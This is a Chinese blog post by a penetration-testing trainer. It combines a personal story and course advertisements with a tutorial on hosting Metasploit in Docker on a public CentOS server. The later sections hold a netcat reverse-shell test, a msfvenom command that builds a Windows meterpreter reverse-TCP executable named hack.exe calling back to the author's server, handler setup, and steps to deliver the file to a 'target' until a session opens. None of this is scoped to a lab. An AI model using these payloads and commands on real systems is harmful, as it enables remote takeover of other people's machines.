必火老师教你打造自己公网上的渗透神器-metasploit

2019年07月17日 10:27:56 作者:必火 阅读数:16378
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学:报名加微信:18622800700,手机:18622800700。推荐学员入学奖励现金2000元

大家好,我是必火,从事IT行业15年了,接触安全渗透测试10年有余,从事安全教学3年,这三年没有好好写文章了,今天感慨一下。

0x01:有心栽花花不开,无心插柳柳成荫
     话说我当时在天融信上班,上的好好的,并不想走教育,只是当时被朋友叫去某培训机构要当讲师,其实我还没打算去呢,结果被他部门负责人怀疑我的能力,连面都没见,就说不用去看了,肯定不行,很气愤,既然这样,那我就去竞争对手家当讲师呗。

0x02:路,要一步一步走
    没有讲师经验的我,准备了七天时间,就直接上台讲课了,我是一个很认真的人,技术应该也不太差,但是要连续讲一个月渗透的知识,并且下面还有四五十的学生,不好好准备是不行的,所以基本上每天都半夜一点多睡觉,看第二天讲课的讲义。

0x03: 一入讲师深似海,再想跳出难如天。
     每一个班级的结束,我都能得到许多宝贵的经验,有些知识,不是你会了,就一定会把大家教会,这完全是两个概念,就比如SQL注入,牵扯的东西太多,你讲SQL注入,但学生根本不懂数据库,那你讲SQL注入怎么能讲明白,你还需要讲数据库,讲完数据库,学生还不知道在网站中数据怎么传值怎么取出的,那你还要讲php,那又会牵扯N多的东西出来,比如:url中index.php?id=1,问号是什么意思,可不可以有两个“?”,报错注入和布尔型注入在代码中有什么不同?......
     三年了,带了差不多500名左右的学生,有没摸过电脑的,有初中毕业的,有厨师,有孩子妈......什么学生都有,就是没有毕业找不到工作的。
       这三年来,很累,时常想逃避,特别怀念渗透测试的日子,因为可以汲取更多的知识,我的想法很强烈,但是真的被学生留了下来,因为我走不开,好多学生来学习,就是看我来了,我若走了,无法给他们交代,还有,去哪里找我这样前无古人后无来者负责任的讲师呢
。。。所以不走了,好好干教育吧,让天下有我正教育之风。

0x04: 外网打造自己的metasploit 神器。
        大家都知道metasploit 神器,kali已经集成了,那么只需要买一台服务器装上kali不就可以了?是的,没问题,这个想法可以,但是好好的服务器,你不就是浪费了,我们都是打工仔,谁有那么多钱浪费。
        其实不用这样,正常买一台服务器即可,装上另一个神器docker,就可以解决问题,我拿自己的服务器举例,我的服务器是CentOS 7 ,我现开始装docker

0x05:CentOS 7 安装docker

1、Docker 要求 CentOS 系统的内核版本高于 3.10 ,查看本页面的前提条件来验证你的CentOS 版本是否支持 Docker 。通过 uname -r 命令查看你当前的内核版本

  1. # uname -r

复制代码

2、使用 root 权限登录 Centos。确保 yum 包更新到最新。

  1. # yum update

复制代码

3、安装需要的软件包, yum-util 提供yum-config-manager功能,另外两个是devicemapper驱动依赖的

  1. #  yum install -y yum-utils device-mapper-persistent-data lvm2


复制代码
4、设置yum源

  1. # yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo

复制代码
5、可以查看所有仓库中所有docker版本,并选择特定版本安装

  1. # yum list docker-ce --showduplicates | sort -r

复制代码

 
6、安装docker  选择一个版本安装就可以了

  1. # yum install docker-ce-17.12.0.ce   

复制代码

7、启动并加入开机启动

  1. # systemctl start docker
  2. # systemctl enable docker

复制代码

8、验证安装是否成功(有client和service两部分表示docker安装启动都成功了)

  1. # docker version

复制代码

 
如有问题,请微信或者电话联系必火:18622800700

0x06: docker安装metasploit1、搜索仓库中metasploit镜像

  1. docker search metasploit

复制代码

 

2、安装 remnux/metasploit

  1. docker pull remnux/metasploit

复制代码

3、等待,取决于网速,大概几个小时。网速快几分钟。然后查看下载好的镜像

  1. docker images

复制代码

 

4、新建一个容器,首次运行需要下载很多东西,等一会 --name ooo 给容器取个名字,

  1. docker run -it --name ooo remnux/metasploit

复制代码

 

5、更新好了之后,会自动进入root@05351fccde1f:/tmp/data#

启动 msfconsole 即可

  1. root@05351fccde1f:/tmp/data# msfconsole

复制代码

 

6、更新metasploit

  1. msf5 > msfupdate

复制代码

7,exit 退出msf,再exit,退出当前docker

  1. root@05351fccde1f:/tmp/data# exit

复制代码

8,docker ps -a 显示所有容器

  1. [root@localhost ~]# docker ps -a

复制代码

 

9、保存这个容器为镜像(这里首先用docker ps -a 查看这个容器的id 或它的名字)

以下两行代码效果一样

  1. docker commit 05351fccde1f

复制代码

8、保存容器后,容器就变为镜像了,给新的镜像起一个名字。

  1. docker tag 容器ID bihuo-msf-2019.7.16

复制代码

9、重新运行新的镜像,并做端口转发,

  1. docker run -it --name bihuo0716 -p 1111:1111 -p 2222:2222 -p 3333:3333 -p 4444:4444 -p 5555:5555 -p 6666:6666 -p 7777:7777 -p 8888:8888 -p 9999:9999 bihuo-msf-2019.7.16

复制代码

10、服务器防火墙设置对外开放的端口

 

11、nmap 扫描外网ip端口,发现防火墙允许的端口都开放了

 

0x07: 反弹shell 实验

1、docker 中 运行nc 来监听 11111 等待链接

 

2、本地局域网 链接远程服务器IP+端口

 

3、组图,准备敲回车。

 

4、反弹shell成功

 

5、运行ipconfig

 

至此,服务器搭建metasploit成功,而且不影响服务器做自己的正事,你该做网站服务器就做网站服务器,你做数据库服务器,就做数据库服务器,根本不影响运行。

0x09:实验二,生成windows被控端

1、msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe

ip地址自行替换为你的服务器ip地址和相对应的端口

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=211.149.*.* lport=222 -f exe -o /tmp/hack.exe/

复制代码

 

2,msf配置相关模块

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST 211.149.111.111
  4. set LPORT 2222

复制代码

 

3、等待目标连入

 

4、下载hack.exe 给目标运行,可以考虑使用ftp,因为生成的hack.exe 在docker中,

  1. apt-get install ftp
  2. ftp
  3. open 211.149.x.x
  4. 输入账号密码
  5. put hack.exe

复制代码

 

5、被控端上线

 

background 后台运行

sessions 查看当前被控端会话数

 

0x08: 参加培训,请联系必火 微信手机同号:18622800700